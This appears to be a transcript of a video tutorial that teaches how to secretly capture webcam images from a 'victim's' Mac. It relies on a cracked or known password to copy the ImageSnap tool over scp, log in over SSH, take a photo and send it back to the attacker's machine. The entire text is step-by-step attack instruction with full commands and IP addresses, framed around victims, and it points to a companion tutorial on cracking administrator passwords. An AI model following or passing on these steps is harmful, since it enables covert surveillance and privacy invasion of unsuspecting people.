Hey, what's going on, everybody? This is Chris, and today I'm going to teach you how to exploit a remote Mac's webcam using a program called ImageSnap. Now, there are a couple of prerequisites that you guys should be aware of. First, you're going to need physical access to the victim's machine so you can crack their username and password unless you already know it, and we're also going to need to enable the SSH service. Now, I've already taught you guys how to crack a Mac OSX administrator account password in a previous tutorial, which is titled How to Crack a Mac OSX Administrator Account Password, so you'll want to refer to that. So let's go ahead and get started. The first thing we're going to do is we're going to download ImageSnap. So let's open up a web browser. And in the URL bar, we're going to navigate to iharder.sourceforge.net/current/macosx/ImageSnap. Press enter. And here we're going to download version 0.2.5. So go ahead and click the download link. You're going to have to wait 5 seconds for the download to begin. And in the prompt, you need to select Save File. And then press OK. And you can see the download is already finished. Go ahead and close out your downloader, and you can close out your web browser. Now we need to open up a terminal. And in terminal, we're going to type tar space xvzf space, and then we're going to specify the path to our imagesnap.tgz file, which is /root/downloads with an uppercase D /image with an uppercase I snap with an uppercase S tac v0.2.5.tgz. Press enter. And that just extracted all of the ImageSnap files. Now what we're going to do is we're going to move our executable ImageSnap file onto our desktop. So type mv space /root/image with an uppercase I snap with an uppercase S tac v0.2.5 /ImageSnap all lowercase space /root/desktop with an uppercase D. Press enter, and you should see the ImageSnap file on your desktop now, like you can see there. Now what we need to do is we need to start the SSH service on our machine. So go ahead and type start space SSH, press enter, and now SSH is running. Now what you need to do is you need to generate your SSH key if you have not already done this in the past, and to do that you're going to type SSHD tac generate and then press enter, and you can see that I've already generated a public key. So I'm going to go ahead and exit out of this now, and go ahead and clear your terminal by typing clear, press enter, and now we're ready to send the ImageSnap file to our victim. So type scp space, and then we're going to drag the ImageSnap file into the terminal, and then space, and then we're going to enter the victim's username, which for me is my computer at, and then the victim's local IP address, which for me is 192.168.0.13, and then colon, and then we're going to enter the path to place the ImageSnap file. I'm going to make it simple, and I'm going to place it on the victim's desktop. So I'm going to type /users /my computer /desktop. Now I'm going to press enter and then refer over to the victim's computer, and you'll see the ImageSnap file appear on their desktop. I'm going to enter the password, and you can see that the SCP transfer was successful, and you can see on the victim's machine that they now have a file called ImageSnap. Now what we need to do is we need to SSH into our victim's computer so we can actually capture an image, and then we're going to send that image back to ourselves. So in terminal, let's type SSH, and then the username, which for me is my computer at, and then the local IP address, which again is 192.168.0.13, and then it's going to ask for a password. Type in your victim's password, and I have now SSH'd into my victim's machine. So now what we need to do is we need to move into the directory where we place that file, which is the desktop. So I'm going to type cd space desktop with an uppercase D, and now it's time to capture the image. So to do that, we're going to type ./ImageSnap space, and then we're going to title our image. I'm just going to call it image.jpg. press enter, and that's going to capture the image. And the image has been captured. You can see that it's appeared there on their desktop. Now what we need to do is we need to send that image back to ourselves. So we're going to type scp space, and then we're going to enter the path to that image file, which is /users/mycomputer/desktop/image.jpg, and then space, and then we're going to enter root at, and then we're going to enter our local IP address, which for me is 192.168.0.12, and then colon, and then the path where we want to move the image file. So I'm going to use /root/desktop, and that's going to place it on my desktop. I'm going to drag this terminal out of the way so we can see it appear. Press enter, enter my password, and there's the image. Go ahead and open it up, take a look at myself. That's a pretty bad picture, but you know, it is what it is. So that's it, guys. That's how you use ImageSnap to capture images on a remote Mac. I hope you guys enjoyed this tutorial, and please don't forget to like, comment, and subscribe. Thank you.